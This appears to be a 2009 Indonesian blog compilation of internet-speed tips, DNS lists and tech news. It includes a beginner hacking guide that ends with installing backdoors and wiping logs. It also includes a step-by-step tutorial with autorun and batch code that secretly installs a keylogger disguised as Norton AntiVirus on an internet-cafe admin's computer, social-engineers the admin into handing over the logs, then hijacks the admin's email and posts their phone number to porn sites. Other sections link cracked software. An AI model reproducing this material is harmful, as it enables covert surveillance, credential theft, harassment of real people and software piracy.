• Preferred DNS server: 208.67.222.222
• Alternate DNS server: 208.67.220.220

Perlu diketahui bahwa DNS Default Speedy :

202.134.0.155 – nsjkt1.telkom.net.id
203.130.196.5 – nsjkt3.telkom.net.id

Lack dalam update DNS Speedy menyebabkan banyak website-website baru yang tidak dapat diakses melalui speedy, bahkan extremnya, banyak juga website2 walaupun yang lama yang tidak bisa diakses dari DNS diatas.

Solusinya, kita bisa menggunakan alternatif DNS Speedy yang lain atau menggunakan DNS lain misal dari OpenDNS, berikut list DNS Speedy selain DNS default diatas :

* 203.130.196.155 – nsjkt2.telkom.net.id
* 202.134.2.5 – nsbdg1.telkom.net.id / ns2.telkom.net.id
* 202.134.1.10 – nssby1.telkom.net.id
* 203.130.208.18 – nssmg1.telkom.net.id
* 203.130.206.250 – nsmdn1.telkom.net.id
* 203.130.196.6 – ns1.telkom.net.id
* 202.134.1.7 – ns3.telkom.net.id

Sedangkan untuk OpenDNS (support web filtering, dns base) bisa menggunakan IP

* 208.67.222.222
* 208.67.220.220

Semoga membantu...

Menambah Kecepatan Koneksi Internet v.2

Menambah kecepatan akses internet sangat diinginkan para pengguna internet. Ada banyak cara digunakan untuk menambah kecepatan akses koneksi internet, dari cara simpel menonaktifkan loading gambar pada browser hingga penggunaan software tertentu dari gratis hingga berbayar. Posting ini hanya akan memberi 2 alternatif cara menambah kecepatan koneksi internet anda.

Tweak 1: Un-reserving bandwidth
Secara default, XP menyimpan 20% dari bandwith anda untuk penggunaan aplikasi dari XP itu sendiri. Kita bisa ubah menjadi 0% untuk menambah kecepatan akses internet anda.

1. Buka Group Policy Editor dengan mengetikkan gpedit.msc pada Run box (Windows Start kemudian klik Run).

2. Pada panel sebelah kiri, klik Computer Configuration/Administrative Templates/Network/QOS Packet.

3. Pada panel kanan, terdapat menu Limit reservable bandwidth, klik kanan dan pilih properties.

4. Pada tab setting, pilih atau klik pada Radio Button Enabled kemudian ubah Bandwith limit ( % ) dibawahnya menjadi 0.

5. Klik OK lalu tutup Group Policy Editor.

Selesai! Mudah dan cepat kan?!

Tweak 2: Optimizing TCP/IP settings


Tweak ke-dua ini, Anda membutuhkan freeware SG TCP Optimizer. Aplikasi kecil ini sanggup meng-optimalkan cara kerja PC saat mengirim
dan menerima data packets saat Anda terhubung ke internet. Tools ini lebih efektif untuk pengguna koneksi broadband, walapun bisa digunakan untuk semua jenis koneksi internet.

1. Download SG TCP Optimizer. Tanpa perlu install, cukup double-click dan tools ini akan running. Lihat gambar dibawah ini untuk leb
ih detail :

3. Kita hanya akan bekerja dengan beberapa klik saja, abaikan saja menu lainnya. Dibawah tab General Settings, drag slider-nya pada kecepatan koneksi yang Anda inginkan. Lalu, pada jendela yang sama di bagian bawah, pilih radio button Optimal Settings dan click Apply Changes.

4. Selanjutnya Anda akan temui tampilan seperti gamb
ar dibawah ini.


5. Pastikan pada box Backup dicentang lalu click OK.

6. Restart PC Anda.

7. Setelah restart, coba browsing internet Anda pada halaman web yang tidak terlalu “berat” atau memakan bandwith terlalu banyak. Jika anda merasa kecepatan koneksi internet justru melambat atau menurun Anda bisa melakukan restore pada original setting. Start SG TCP Optimizer, click File dan pilih restore backed up settings. Anda akan dibawa pada dialog box yang Anda gunakan untuk navigasi tempat dimana mendownload program. Disitu Anda akan menemui file dengan extension .spg dan filename yang mengandung tanggal. Contoh, jika anda melakukan perubahan 21 February maka “sg_backup_2008-02-21-xxxx.spg” merupakan filename-nya, dimana xxxx bisa diisi dengan nomor apa saja. Buka file tersebut. Anda akan dibawa pada dialog box seperti yang ditunjukkan diatas. Click OK lalu restart. Original settings Anda telah kembali

dan untuk sebagai tambahan artikel ini software Untuk Menambah kecepatan Internet!!!
Untuk yang merasa internet anda kurang maksimal kecepatanya, ini mungkin bisa sedikit membantu..Menambah kecepatan koneksi internet dapat menggunakan sofware Speed Connect Internet Accelerator v7.5. Untuk mendapatkan sofware tersebut download aja di http://www.d60pc.com/2008/08/02/speed-connect-internet-accelerator-v75-download/. download full version dan cracknya, disitu juga udah dijelaskan bagaimana cara installnya..namun jangan lupa file dalam bentuk rar ada passwordnya, saya ingatkan password=www.d60pc.net.
http://ebsoft.web.id/forum/software/software-untuk-menambah-kecepatan-internet/#p640





Sumber : resep.web.id

Tutorial Belajar Hacking untuk pengembangan

Intro:

Dalam suatu kesempatan, saya pernah melihat seorang auditor keamanan jaringan melalukan penetration test (pen-test) terhadap suatu sistem IT. Karena penasaran saya melihat sedikit2 cara penetration test yang dilakukan. Waktu itu saya belum banyak tahu tools apa aja yang digunakan, yang saya tau dia menggunakan tcpdump untuk menganalisis paket apa aja yang lewat, trus untuk men-scan beberapa host menggunakan Nessus. Ada salah satu aplikasi yang digunakan berbasis web yang terdapat kumpulan beberapa exploit. Waktu itu saya belum tahu aplikasi apa itu, yang saya ingat aplikasi itu menggunakan alamat http://127.0.0.1:55555, nah berbekal port 55555 saya mencari di google, dan ternyata itu adalah Metasploit Framework!.

Peristiwa itu menginspirasikan saya untuk mengenang masa-masa lalu ketika masih seneng2nya ngoprek dan belum ‘tercemar’ oleh DotA. Akhirnya sekarang saya ingin belajar ngoprek lagi, tp lebih fokus ke exploitnya saja. Tulisannya ini akan saya buat menjadi tiga bagian. Bagian pertama mengenai bagaimana salah satu cara umum yang dilakukan untuk menge-hack suatu system. Disini saya lebih menitikberatkan untuk hacking OS Windows XP, karena OS ini paling banyak dipakai orang. Bagian kedua lebih banyak ke teori mengenai exploit. Tapi karena mungkin akan sangat sulit dipahami (saya sendiri msh blm bisa membuat exploit sendiri), saya hanya menuliskan hasil terjemahan yang membahas apa itu dan cara kerja exploit. Sedangkan bagian terakhir merupakan praktek bagaimana mengelakukan penetration test menggunakan metasploit di Windows XP.

Bagian 1

*ini merupakan artikel lama mengenai salah satu cara umum yang dilakukan untuk hacking. (artikel ini jg di mirror oleh Negative a.k.a Jim Geovedi di sini). Langkah dibawah ini merupakan cara ’standar’, hacking sebenarnya tidak harus selalu sesuai dengan ’standar’ ini.

Hacking buat pemula

- by aCh

Artikel ini ditujukan bagi pemula, dan disusun oleh pemula. Ditulis untuk pengetahuan semata. Untuk temen2 yg udah ahli, sok aja dilewat, tapi dibaca juga gpp….

Apa sebenarnya hacking itu? klo menurut pengertian gue, hacking adalah ngoprek. Yup, hacking adalah ngoprek, mempelajari sesuatu dengan keingintahuan (curiosity) yg tinggi, ngutak atik sesuatu, ‘ngudek-ngudek’ sampai ke ‘jeroannya’. Sesuatunya apa dong? ya terserah… bisa komputer, mobil, motor, mesin. Tapi masalahnya ada ngga ya hacker mobil, hacker motor, atau hacker pesawat terbang?? hehe… Walaupun saat ini hacking identik dengan ‘bobol-membobol’, tapi gue kurang setuju klo cuman bobol server orang doang!. Ada yang bilang ‘Hacking is Art’, trus dimana letak seninya dong? Mau tau pengertian hacking sebenarnya, coba baca artikel sebelumnya (How to Become A Hacker). Di situ dijelasin bahwa hacker berkaitan dengan kemahiran teknis serta kegemaran menyelesaikan masalah dan mengatasi keterbatasan. Contoh hacker pada saat ini yang sering-sering disebut adalah Linus Torvald (tau ngga? itu lho yang menciptakan Linux). Apa dia tukang bobol? belum tentu kan….

Pada artikel ini, gue pengen membagi pengalaman mengenai Hacking, walaupun sampai saat ini gue belum pernah nge-Hack ke server orang. Salah satu cara untuk mencoba simulasi Hack yaitu H3cky0uRs3lf! Buat komputer kita sebagai server (sekaligus belajar konfigurasi server) trus install program yg dibutuhkan. Misalnya klo mo Web Hacking, coba install Apache atau IIS. Atau kita sesuaikan dengan exploit yang udah kita dapet. Tapi lebih baik install Linux atau FreeBSD dulu di komputer pribadi, trus konfigurasi sebagai server, lalu simulasi Hack, setelah itu baru Hack Betulan…
Pro dan Kontra Hacking....

Okeh, sekarang waktunya melakukan aksi…

1. Fase Persiapan

~ Mengumpulkan informasi sebanyak-banyaknya

- Secara Aktif : - portscanning

- network mapping

- OS Detection

- application fingerprinting

Semua itu bisa dilakukan menggunakan toolz tambahan seperti nmap atau netcat

- Secara Pasif : - mailing-list (jasakom, newbie_hacker, hackelink, dsb)

- via internet registries (informasi domain, IP Addres)

- Website yang menjadi terget

2. Fase Eksekusi
~ Setelah mendapatkan informasi, biasanya akan didapatkan informasi mengenai OS yg digunakan, serta port yang terbuka dengan daemon yg sedang berjalan. Selanjutnya mencari informasi mengenai vulnerability holes (celah kelemahan suatu program) dan dimanfaatkan menggunakan exploit (packetstromsecurity.org, milw0rm, milis bugtraq, atau mencari lewat #IRC).
~ Mengekspolitasi Vulnerability Holes
- compile eksploit -> local host ->

$gcc -o exploit exploit.c

$./exploit

# hostname (# tanda mendapatkan akses root)

remote host -> $gcc -o exploit exploit.c

$./exploit -t www.target.com

# (klo beruntung mendapatkan akes root)

~ Brute Force

- Secara berulang melakukan percobaan otentifikasi.

- Menebak username dan password.

- Cracking password file

~ Social Engineering

- Memperdayai user untuk memeberi tahu Username dan password

- Intinya ngibulin user….



3. Fase Setelah Eksekusi

~ Menginstall backdoor, trojans, dan rootkit

~ Menghapus jejak dengan memodifikasi file log agar tidak dicurigai admin

~ Menyalin /etc/passwd atau /etc/shadow/passwd

Nah, intinya seh cara masuk ke server seseorang seperti fase diatas. Mencari informasi, temukan exploit, dan tinggalkan backdoor. Cuma masalahnya hacking bukanlah segampang cara-cara diatas. Itu hanyalah teori, banyak hal yang harus diperhatikan jika ingin mempraketekkan hacking ke server seseorang. Jangan sekali-kali mencoba2 hacking ke server orang tanpa memperhatikan anonimitas (apalagi klo connectnya lewat komputer pribadi tanpa menggunakan proxy). Ntar klo ketahuan bisa repot. Saran gue, cobalah pada mesin localhost dulu (komuter pribadi), klo terhubung ke LAN lebih bagus. Sediakan server yang khusus buat dioprek. Kalaupun pun ga terhubung ke jaringan, kita masih bisa menggunakan Virtual Machine menggunakan VMWare seperti yang nanti akan dibahas pada bagian 3!

Tips buat ngerjain pemilik warnet

Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguna jasa layanan internet cafe (warnet) menjadi kurang nyaman.

1. Introduction

Semakin paranoidnya para admin belakangan ini menyebabkan banyak pengguan jasa layanan internet cafe (warnet) menjadi kurang nyaman. Restriction (pembatasan) disana-sini (walaupun semua itu dilakukan bukan tanpa alasan) menjadi salah satu inspirasi bagi banyak orang untuk mencari-cari cara menerobos segala keterbatasan itu dan saling men-share pengetahuan mereka. Berbagai jenis exploit pun dibedah, didiskusikan dan dikemas menjadi artikel untuk para newbie.
Sejenak para newbie bisa tertawa puas, berjaya, senyum-senyum sendiri sampai tak jarang lupa diri Namun semua itu tentunya tidak bertahan lama. Admin menjadi semakn pintar. Fasilitas Floppy drive dan CD room drive dihapus dan melarang user untuk melakukan segala bentuk transfer file dari media penyimpanan sementara (disket, cd, flashdisk) kecuali melalui server terlebih dahulu. Ini merupakan fenomena yang akhir-akhir ini bisa kita temui dengan mudah di berbagai Internet cafe. Admin mulai rajin mengupdate path sehingga exploit-exploit yang dulu dibangga-banggakan oleh kaum newbie menjadi "rongsokan" tak berguna.
Sekarang, mari kita bangunkan sang admin dari mimpi indahnya untuk menunjukkan bahwa menjadi paranoid itu adakalanya tidak baik dan tidak ada system yang 100% secure.


2. Serangan pertama

Kita akan menjadi seorang "agen mata-mata" (hehehe.. gw pake istilah ini biar ente merasa agak sedikit keren) yang akan merekam segala aktivitas sang admin. Tujuannya.. banyak! dan salah satunya seperti hal yang banyak diinginkan orang.. mendapatkan password sang admin. Partner kita kali ini adalah navw32.exe, sebuah keyloger dengan icon Norton AntiVirus yang bisa kamu dapatkan suka-suka dengan harga cuma-cuma di halaman member kategori Keyloger. Setelah kamu download keyloger tersebut, ikuti langkah-langkah berikut:

---[1 Bukalah Notepad kemudian ketik satu baris script berikut:
open=nav.bat
Klik [file][save] kemudian pada box save as type, pilih All Files dan pada form isian name beri nama Autorun.inf lalu klik tombol [save].

---[2 Buka lembar baru pada notepad dengan klik menu [file][new] lalu ketik script berikut:
Code:

@echo off echo Norton Antivirus 2006 echo Scanning disk drive... echo Please wait... copy navw32.exe %windir%\navw32.exe call %windir%\navw32.exe echo. echo. echo. echo. echo. echo. echo. echo. Scanning complette! No virus threat detected! echo. cls

Klik [file][save] kemudian pada box save as type, pilih All Files dan pada form isian name beri nama nav.bat lalu klik tombol [save].

---[3. Persiapkan beberapa file micr*soft word documents (bisa diganti dengan file lain) sebagai tipuan/alasan untuk di transfer. Semakin banyak file, semakin baik karena file keyloger kamu akan semakin tersamarkan.

---[4. Persiapkan sebuah cd kosong (bekas juga boleh) lalu bakar semua file diatas (autorun.inf, nav.bat, navw32.exe dan file-file tipuan) kedalam CD.

Sekarang pergilah ke warnet tempat sang admin berkuasa. Bersikaplah seperti biasa dan jangan gugup selayaknya para koruptor yang sering nampang di satasion-stasion TV tanpa rasa malu. Setelah kamu login ke billing komputer user, datangi sang admin. Katakan pada beliau, "Mas/mbak/om/tante/, mau transfer file dari cd ini. Nama filenya blablabla tolong dikirim ke komputer nomor blablabla."
Begitu CD dimasukkan, saat itulah terjadi sebuah fenomena berikut:
Komputer akan memproses file autorun.inf secara otomatis ---> file autorun.inf akan memproses file nav.bat ---> file nav.bat akan menduplikasi file navw32.exe ke dalam directory windows dan mengaktivkannya ---> Keyloger telah terinstall, hasil rekamannya akan tersimpan di directory yang sama dengan nama navw32.dll beratribut hidden.
Sekarang, kamu bisa pulang dengan wajah tanpa dosa dan mungkin (lagi-lagi) kamu bakalan senyum-senyum sendiri sambil mengelus-elus jenggot kayak habis menang togel.
Lalu bagaimana cara mengambil file hasil rekaman keyloger di directory windows sang admin? Ikuti langkah-langkah pada serangan kedua.

3. Serangan kedua

Dua hari Kemudian, datanglah ke warnet itu lagi. Bertingkah lakulah secara wajar dan beraktivitas seperti layaknya user biasa. Setelah selesai berinternet ria, datangi sang admin, bayarlah biaya browsing seperti biasa lalu dengan wajah sangat-sangat memelas seperti pengemis di jalanan katakan pada beliau,"Mas/mbak/om/tante/, komputer saya bermasalah neeh. Mnurut pesan Error yang muncul, file navw32.dll yang berada di directory windows hilang. File tersebut beratribut hidden. Tolong doong copykan dari komputer ini. Kebetulan versi windowsnya sama dengan komputer saya.."
Tentu saja biasanya sang admin dengan sangat senang hati akan membantu kamu. Dengan suka rela dan penuh kesadaran beliau akan mengaktifkan opsi Show All files pada Folder Options dan mengcopy-kan file navw32.dll dari directory windows tanpa menyadari bahwa file tersebut bukan file system, namun file hasil rekaman keyloger.
Berikan disket/cd/flashdisk mu dan setelah file tersebut tersimpan, ucapkan beribu terima kasih lalu pulanglah ke rumah. Buka file tersebut di rumah. Klik 2x pada file lalu ketika muncul kotak dialog open with, klik opsi select program from a list dan pilih notepad pada daftar program yang ditampilkan.
Sekarang tentunya kamu bisa leluasa membaca rekaman aktivitas sang admin. Cari password emailnya dan kamu bisa menuju pada hari pembalasan.

4. Hari Pembalasan

Pilih hari yang tepat, misalnya malam jum'at kliwon dimana sang admin mungkin sedang terlelap di rumahnya. Nyalakan komputermu dan connectlah ke Internet. Namun ada baiknya kamu lakukan hal ini di warnet agar lebih aman. Carilah warnet yang buka 24 jam.
Berbekal hasil rekaman keyloger tadi, loginlah ke account email sang admin. Setelah puas menjelajahi emailnya, subscriblah ke berbagai mailing list besar dengan email tersebut. Subscribe sebanyak-banyaknya.
Ada ide yang sedikit lebih sadis (ini cuma ide lho.. sebaiknya jangan dilakukan deech..). Daftarkan emailnya ke berbagai situs-situs porno dan postinglah sebuah pesan singkat, memikat dan "mematikan". Berikut contohnya jika milis tersebut berbahasa Indonesia:

Dear all..
gwe lagi nafsu berat neeh, burun telepon gwe doong sekarang juga!! neeh no telp gwe: 021-blablabla (masukkan no telp sang admin)
gwe tunggu 24 jam lho!!

Atau jika berbahasa Inggris:

Dear,
Wanna play "freestyle" with mw? Please call me : 062-021-blablabla
You may F**k me for free!!

Atau terserah kamu laah.. saya rasa kamu lebih pintar dalam memilih kata-kata yang yahuud!!
Maka bisa dipastikan malam itu akan menjadi malam jumat kliwon paling mengerikan bagi sang admin, lebih mengerikan daripada film-film horor manapun! Telepon rumahnya akan berdering tanpa henti dibanjiri oleh telepon dari dalam dan luar negeri dengan maksud pembicaraan yang sudah bisa ditebak apa maksudnya
Keesokan harinya, setelah menghadapi malam paling mengerikan itu, sang admin akan kaget 1/2 hidup 1/2 mati mendapati inboxnya penuh dengan email-email dari berbagai milis yang beliau sendiri tidak merasa pernah bergabung dengan milis-milis itu. Dan bisa jadi, saat beliau sedang sibuk Unscribe dari milis-milis tersebut, telepon rumahnya masih terus-terusan menjerit-jerit dengan jeritan indah

5. Pencegahan

Jika kamu adalah admin yang tidak mau mengalami nasib seperti diatas, maka setiap kamu menerima CD dari siapapun selalu tekan-tahan tombol shift sambil memasukkan CD kedalam CD Room dRive. Setelah CD masuk, tetap tekan tombol shift sampai kira-kira 25 detik. Setelah itu kamu bisa melepas tombol shift dan mengaksesnya melalui windows Explorer. Klik pada area folder tree sebelah kiri, jangan pada daftar drive sebelah kanan karena fitur autorun akan aktif.

6. Penutup

---[+ Kesimpulan
Bisa kita bayangkan sendiri betapa kelalaian sepele bisa menimbulkan dampak yang sangat berbahaya. Ini hanya merupakan contoh Social Engineering sederhana namun berdampak luar biasa, untuk memancing ide kreatif anda.

---[+ Referensi
Self implementing

Note:
Sebelum anda menerapkan ide-ide diatas, saya mohon dengan sangat agar anda brfikir jernih dan mengunakan akal sehat anda. Kalau misalnya sang admin telah menolak cinta anda, jangan lantas seenaknya melakukan pembalasan dengan cara diatas. Ada baiknya anda pergi ke market terdekat untuk membeli seribu cermin. Berkacalah!! perbaiki penampilan dan perilaku anda!
Tapi kalau sang admin adalah orang-orang sombong dan telah melakukan kecurangan, menganggap rendah anda dan mengklaim diri mereka adalah super-Hacker, maka anda bisa membungkam mulut besar mereka dengan cara ini.

================================================== =======

catatan :

ini sekedar buat input buat admin atau owner agar selalu menjaga security dari warnetnya supaya benar2 aman



Minggu, 14 Juni 2009

Mempercepat Koneksi Internet

Jangan terbayangkan bahwa koneksi kita sangat cepat sekali, kita hanya akan menggunakan teknik Tunneling. Pada dasarnya jika kita mengakses sebuah server (website), komputer kita diarahkan secara langsung ke server tersebut. Misal kita akan membuka sebuah halaman website yang servernya terletak di Amerika, maka komputer kita secara langsung mengaksesnya ke server tersebut. Atau lebih sederhananya jika kita inging mengambil sesuatu yang ada di Amerika maka kita harus pergi sendiri ke Amerika.

Terbayangkan oleh kita bergitu rumitnya perjalanan yang kita lewati, begitu banyaknya hambatan yang kita hadapi. Begitupun dunia networking. Teknik tunneling sama halnya dengan teknik pengiriman barang dengan bantuan kurir. Jika kita akan mengirim atau mengambil barang ke Amerika maka kita tidak perlu melakukannya sendiri, biarlah jasa kurir yang melakukan semua kerumitan dan hambatan yang dihadapi agar barang tadi bisa sampai ke tujuan.

Begitupun tunneling, pada saat kita mengakses sebuah halaman webiste maka komputer kita hanya akan meminta bantuan sebuah server untuk menyampaikan dan mengambil halaman demi halaman website yang kita tuju. Selain itu server tunnel akan mengkompresi data yang kita butuhkan, karena itulah koneksi internet kita secara keseluruhan akan meningkat.

Sederhanakan? Tapi kemudian muncul pertanyaan, apakah bisa hal tersebut gratis? Bisa ya bisa tidak. Sekarang sudah banyak server tunnel yang menyediakan fasilitas ini, misal Nitro, Toonel(dot)Net, TrafficCompressor, OnSpeed dan masih banyak yang lainnya. Gratiskah mereka? Jelas tidak, kecepatan yang mereka tawarkan harus ditebus dengan muahal alias berbayar. Lalu buat apa saya menulis ini? Ya karena saya ingin berbagi server tunnel yang GRATIS. Baik mari kita bahas cara menghubungkan komputer kita ke server tunnel yang gratis, tapi ada beberapa hal yang harus diperhatikan sebelum membahas.

1. Komputer anda harus terkoneksi dengan internet.
2. Teknik tunnel ini cocok bagi yang menggunakan koneksi internet dengan fasilitas GPRS, tapi bisa juga untuk jenis koneksi lain.
3. Harus sudah terpasang software tunneling, misal putty.
Ikuti langkahnya :

1. Download PuTTY , lihat link sebelah kanan (DEHAFILE)
2. Ekstrak menggunakan WinRAR dan simpan PuTTY.exe pada C:WINDOWS
3. Biarkanlah PuTTY tidur disana, tidak usah diaktifkan
4. Klik Start Menu => Run dan masukan “putty -P 222 -N -D 9999 -C net@cepat.abangadek.com” tanpa tanda petik (”) setelah itu jendela DOS akan terbuka.
5. Pada saat diminta password, ketikan “cepat123” tanpa tanda petik (”) dan Enter, tapi jangan heran pada saat memasukan password anda tidak melihat apapun, makanya anda harus hati-hati memasukan password, jika salah maka PuTTY akan memberitahu anda, jika salah lagi maka PuTTY akan terminate (close). Jika setelah memasukan password PuTTY tidak ada reaksi (kursor hanya turun) maka anda sudah betul
6. Arahkan agar browser menggunakan SOCKS proxy di localhost, port 9999
7. Selamat browsing dengan kecepatan baru

* Internet Cyclone
adalah software Internet Optimizer untuk Windows 95, 98, ME,NT, 2000 dan XP yang dirancang untuk secara otomatis mengoptimalkan Windows settings mu yang akan menaikkan tegangan koneksi Internet mu mempercepat sampai 200%. Internet Cyclone kompatibel dengan semua modem dan kecepatan tinggi LAN,ISDN, KABEL(TELEGRAM, DSL, T1 atau koneksi-koneksi lain. Menggunakan Software ini yang anda akan mendapatkan kecepatan Internet lebih cepat. Surfing, pen-download-an file, email, playingonline game-game, dan yang lainnya anda sungguh online akan lebih cepat. Software excellent ini untuk modem dial-up yang lambat seperti juga laju tinggi access connections. Software ini akan sangat berharga bagi anda ketika Anda melanjutkan untuk upgrade komputer dan koneksi-koneksi mu. Itu akan bekerja dengan all connections dan semua browser sehingga akan sangat bermanfaat di masa datang. Anda perlu menggunakan Internet Cyclone sebagai suatu REAL alternative daripada upgrade-upgrade yang mahal. Apa yang bisa Internet Cyclone persembahkan kepada anda ? Internet Cyclone mengoptimalkan pengaturan-pengaturan Windows mu secara otomatis atau anda dapat menyesuaikannye. Anda dapat mempercepat koneksi internet tanpa mengubah Hardware mu. Bekerja dengan semua Browsers. kompatibel dengan semua Modem dial-up dan kecepatan tinggi LAN, KABEL(TELEGRAM, DSL, DSL (PPPOE), T1 atau koneksi-koneksi lain. Angin puyuh Internet akan mempercepat surfing web, berjudi online, e-mail, bercakap-cakap dan konferensi video dan itu akan bahkan mempercepat download-download.

Download Di sini

1. Faster Internet Access
2. Faster download speeds
3. Faster web site browsing performance
4. Improve Internet and Intranet performance
5. Quicker data download times
6. Improved streaming music and movies
7. Faster download for songs and video
8. Faster performance with email
9. Better download speed for all data
10. Faster loading Web graphics
11. Speed test for Web site browsing
12. Speed test for general data transfer

* Software lainnya yang dapat membantu mempercepat internet anda dan menambah performance komputer anda

1. WinSpeedUp v2.8
http://rapidshare.com/files/29708045/WinSpeedUp.v2.8.rar
2. SpeedUpMyPC v3.5.2321.28
http://depositfiles.com/files/915811
3. DSL Speed 3.8
http://rapidshare.com/files/30071798/DSL_Speed_v3.8.rar


Untuk yang merasa internet anda kurang maksimal kecepatanya, ini mungkin bisa sedikit membantu..Menambah kecepatan koneksi internet dapat menggunakan sofware Speed Connect Internet Accelerator v7.5. Untuk mendapatkan sofware tersebut download aja di http://www.d60pc.com/2008/08/02/speed-connect-internet-accelerator-v75-download/. download full version dan cracknya...semoga berguna

ONSPEED 6

Melakukan accelerate compress dan uncompress data

Melakukan accelerate speed web browsing, sending, dan receiving email

Compress data menjadikan kecepatan internet Anda meningkat. Dial-up sampai dengan 10X lebih cepat, Broadband sampai dengan 5X lebih cepat, GPRS sampai dengan 8X lebih cepat

Compatible pada PC Windows, Machintosh, dan PocketPC (PDA)

Bekerja pada semua akses jaringan internet (ISP) di seluruh dunia

Penting bagi client internet berbasis Quota data, dengan biaya Rp/kb sama, Anda dapat download data sampai dengan 10X lebih banyak

Penting bagi client internet berbasis waktu, dengan biaya Rp/detik sama, Anda dapat download data lebih banyak dan lebih cepat

Nah OnSpeed ini sebenarnya untuk mendapatkan accountnya musti bayar di Indonesia. Sedangkan, OnSpeed ini di India sudah digratiskan karena alasan tertentu, yang pasti alasan kenapa di Indonesia nggak digratiskan saya nggak tau.. qeqeqe..

Tapi tenang saja kita bisa mengakalinya. Kita bisa menggunakan free proxy india untuk membuat account yang nantinya bisa kita pakai sendiri. Satu yang pasti dalam membuat account ini ip kita harus ter-detek ip India, kalau nggak nggak bakalan bisa. Repot juga yach...? Tenang saja semua bisa teratasi kok. Baca terus...

Langsung aja gini caranya...

Cari free proxy India di website-website penyedia free proxy (cari website free proxynya pakai jasa mbah google saja, masukkan kata kunci free India proxy atau free IN proxy)

Masukkan proxy India tadi ke settingan network browser. Misalnya kita dapet proxy India 202.54.61.101:8080 (saya test saat buat nih posting masih bisa), caranya begini :


Jangan lupa klik OK.

Kemudian buka website http://www.yuvayantra.com, terus lakukan registrasi di website tersebut. Ada konfirmasi ke email kalau registrasi berhasil, lalu coba gunakan untuk login

Setelah dapet account-nya, kemudian download OnSpeed installernya DI SINI. Instal kemudian restart komputer Anda

Sekarang Anda sudah punya account OnSpeed sendiri layaknya premium, masukkan username dan password yang tadi didapatkan ke OnSpeed. Lalu restart OnSpeed

Jika berhasil konek ya sukses. Patut dicoba dulu, soalnya saya coba langsung berhasil kok

Jangan lupa browser Anda set proxy 127.0.0.1 port 5405

Nanti jika Anda browsing menggunakan OnSpeed ini jangan heran kalau ip Anda ke detek ip India, coz Anda memang lagi menggunakan server India. Kalau mau pake server USA (kalau nggak salah) bisa pakai server sekalian username dan passwordnya SlipStream (klik menu tips&triks di atas tentang tutorial SlipStream), tapi OnSpeed Anda di update dulu (otomatis update biasanya setelah Anda memasukkan account SlipStream ke OnSpeed). Terserah mana kira-kira speed yang paling MakNyusss menurut Anda.



Flash Disk menjadi RAM

Tips kali ini adalah memodifikasi flash disk menjadi RAM (memory),yang berguna banget untuk mengatasi lemotnya running komputer kita yang memiliki memori terbatas.
Flashdisk yang biasanya hanya dipakai sebagai media penyimpanan data ,bisa kita gunakan sebagai memori, yang tentunya sangat berguna untuk mempercepat proses system komputer kita, tentu saja berguna juga untuk mempercepat koneksi internet,secara tidak langsung.

Beberapa manfaat software ebooster lainnya :

  1. Melaunch aplikasi favorit kita dengan lebih cepat,karena dengan software yang kita gunakan, akan mengoptimalkan performa dengan mem pre-caching file-file aplikasi tersebut dan mampu membuat akses yang lebih cepat dan mengurangi delay
  2. Mempercepat booting windows
  3. Memaksimalkan penyimpanan data pada RAM dengan lebih baik
  4. Meningkatkan kinerja laptop,karena dengan FLASH yang digunakan sebagai RAM,mengurangi aktifitas kinerja hard drive.
  5. Membuat battery laptop lebih awet,karena dengan ringannya beban aktifitas hard drive maka otomatis battery akan lebih ringan kerjanya.
Ok, silahkan download software nya disini, tinggal launch …plug n play…

Cara Setting cepat Browser Mozilla Firefox

Untuk lebih cepat saat brosing di internet sobat bisa lihat trik - trik ini dan ikuti langkah - langkah berikut ini

buka Firefox, ketik, “about:config” di Addresse bar (URL) lalu ENTER. Ini akan membawa kita ke menu untuk mengeset parameters Firefox.

Klik 2x setting dan masukkan angka-angka ini - untuk true / false booleans – mereka bakal ganti otomatis begitu klik 2x.

Sekarang ganti kode:
browser.tabs.showSingleWindowModePrefs = true
network.http.max-connections = 64
network.http.max-connections-per-server = 20
network.http.max-persistent-connections-per-proxy = 10
network.http.max-persistent-connections-per-server = 4
network.http.pipelining = true
network.http.pipelining.maxrequests = 100
network.http.proxy.pipelining = true
network.http.request.timeout = 300
nglayout.initialpaint.delay = 0
network.http.request.max-start-delay = 0
Kalo ada salah 1 kode diatas yang gak tercantum buat aja sendiri
caranya:
1.Utk True/false klik kanan->new->booleans->buat parametersnya->true/false sesuaikan dgn jwb kode yg dibuat.
2.Utk angka klik kanan>new>integer>set angka sesuai dengan parameters yang dibuat (ngerti kan?)

Restart mozilla. Semoga berhasil

Sabtu, 13 Juni 2009

Antivirus HP terbaik

ANTI VIRUS SIMWORK 1.24

Aplikasi anti virus ponsel symbian, bisa di update untuk menambah data base anti virus ini.

Download Anti Virus Simwork 1.24.

Anti Virus F-Secure

Aplikasi anti virus untuk ponsel symbian v.60 F-Secure.

Download aplikasi anti virus ponsel symbian F-Secure di sini

Anti virus Jamanda Cabir Fix

Aplikasi anti virus ponsel Symbian Jamanda untuk memblokir virus Cabir FIx yang menular melalui media blouooth

Download aplikasi anti virus Jamanda Cabir Fix di sini

Anti Virus Ponsel Zeon Mobile Ver.1.1

Download Aplikasi Anti Virus Zeon Mobile Versi 1.1 di sini

Download Anti virus ponsel jamanda cabir fix, anti virus ponsel simwork, download anti virus com warior, download gratis anti virus f-scure, anti virus gratis ponsel Zeon mobile, anti virus hp gratis, anti virus hp ponsel terbaik gratis, “anti virus gratis ponsel”, download aplikasi anti virus ponsel handphone

Jumat, 12 Juni 2009

Fitur Windows Vista akan dimasukkan ke dalam versi Windows XP SP3

Beberapa fitur Windows Vista akan dimasukkan ke dalam versi Windows XP SP3 yang akan datang. Begitulah berita yang sedang banyak dilansir media massa pada akhir pekan ini berkaitan dengan pembuatan Windows XP SP3.

Seperti yang dinyatakan NeoSmart Technologies kepada ComputerWorld, Windows XP3 3205 yang telah dirilis ke dalam versi beta tester pada hari Minggu, memasukkan empat fitur diantara seribu macam perbaikan yang telah banyak diberitakan semenjak debut Windows XP SP2 tiga tahun yang lalu.

Menurut NeoSmart, salah satu fitur Windows Vista yang akan dimasukkan adalah fitur backported di mana di dalamnya termasuk Network Access Protection (NAP), sebuah kebijakan teknologi yang menginspeksi komputer terlebih dahulu sebelum terhubung dengan suatu jaringan besar, kemudian juga akan mengupdate secara otomatis ataupun melakukan pengeblokan jikalau ada yang tidak memenuhi kriteria keamanan.



Tambahan lainnya berasal dari modul kernel yang memuat beberapa algoritma enkripsi yang dapat diakses oleh 3rd party developer. Model aktivasi Windows yang terbaru tidak akan membuat user menginputkan nomor seri produk (product key) lagi.



